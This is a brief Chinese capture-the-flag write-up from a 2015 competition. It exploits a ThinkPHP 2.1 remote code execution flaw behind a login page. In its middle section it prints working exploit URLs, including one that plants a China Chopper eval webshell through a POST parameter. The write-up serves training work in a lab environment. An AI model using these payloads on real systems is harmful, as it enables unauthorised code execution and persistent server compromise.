2015中國網絡安全大賽:框架漏洞真題

看題分析:打開網址,是一個後臺登錄,結合框架漏洞,想到了struts漏洞。

0x00 收集信息

發現網站不是struts架構,於是截包看了下數據,有所發現:


明顯是一個ThinkPHP2.1的產品,直接搜索ThinkPHP2.1+漏洞,找到幾篇任意代碼執行的漏洞。

0x01 任意代碼執行漏洞

根據說明(原理網上比較多,我這裏就不陳述了,別人分析更好),構造利用URL

www.xxx.com/index.php/module/action/param1/${@print(THINK_VERSION)}


www.xxx.com/index.php/module/action/param1/${@print(phpinfo())}


菜刀馬鏈接:

www.xxx.com/index.php/module/action/param1/${@print(eval($_POST(gumin)))}

0x02 getshell+getkey


flag就在html目錄下



實驗環境:www.ichunqiu.com

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章